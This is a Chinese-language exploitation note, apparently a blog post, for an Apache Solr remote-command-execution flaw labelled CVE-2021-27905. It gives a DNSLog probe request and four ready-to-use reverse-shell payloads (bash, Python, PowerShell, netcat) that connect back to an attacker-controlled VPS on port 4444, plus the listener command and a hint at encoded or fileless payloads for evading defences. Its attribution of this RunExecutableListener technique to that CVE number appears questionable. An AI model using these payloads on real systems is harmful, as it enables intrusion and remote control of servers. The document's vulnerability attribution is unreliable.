CVE-2021-27905漏洞利用笔记
CVE-2021-27905 漏洞利用笔记(Apache Solr RCE)
📌 漏洞简介
- 漏洞编号:CVE-2021-27905
- 影响组件:Apache Solr DataImportHandler(DIH)
- 漏洞类型:远程命令执行(RCE)
- 利用条件:DIH 处于开启状态,攻击者可通过
config接口注入恶意RunExecutableListener配置。
✅ 1. 使用 DNSLog 进行漏洞探测
📌 请求包(DNSLog 探测)
{
"method": "POST",
"url": "http://www.example.com/solr/{core}/config",
"headers": {
"Content-Type": "application/json"
},
"body": {
"add-listener": {
"event": "newSearcher",
"name": "dnslog_test",
"class": "solr.RunExecutableListener",
"exe": "nslookup test.dnslog.cn"
}
}
}
📌 结果分析
| 情况 | 漏洞存在 | 漏洞不存在 |
|---|---|---|
| DNSLog 有解析请求 | ✅ 目标存在漏洞 | ❌ 可能已修复或受保护 |
| DNSLog 没有记录 | ❌ 目标可能已修复 | ✅ 目标安全 |
✅ 2. 反弹 Shell POC(Linux & Windows)
📌 Linux Bash 反弹 Shell
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "/bin/bash",
"args": [
"-c",
"bash -i >& /dev/tcp/YOUR-VPS-IP/4444 0>&1"
]
}
}
📌 Python 反弹 Shell
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "python3",
"args": [
"-c",
"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-VPS-IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
]
}
}
📌 Windows PowerShell 反弹 Shell
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "powershell",
"args": [
"-NoP",
"-NonI",
"-W Hidden",
"-Exec Bypass",
"-Command",
"$client = New-Object System.Net.Sockets.TCPClient('YOUR-VPS-IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
]
}
}
📌 Netcat 反弹 Shell(适用于 Linux 和 Windows)
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "nc",
"args": [
"YOUR-VPS-IP",
"4444",
"-e",
"/bin/sh"
]
}
}
✅ 3. 监听反弹 Shell
在你的 VPS 服务器上监听 4444 端口:
nc -lvnp 4444
📌 重要参数
| 参数 | 说明 |
|---|---|
www.example.com |
目标 Solr 服务器 IP/域名 |
{core} |
目标 Solr 核心名称(如 mycore) |
YOUR-VPS-IP |
你的 VPS 公网 IP |
4444 |
监听端口(可修改) |
🚀 更隐蔽的 Payload(如 Base64 编码、无文件执行等)
如果目标服务器有安全机制,可以尝试 Base64 编码执行 或 无文件加载 Payload,你可以根据具体情况调整。
浙公网安备 33010602011771号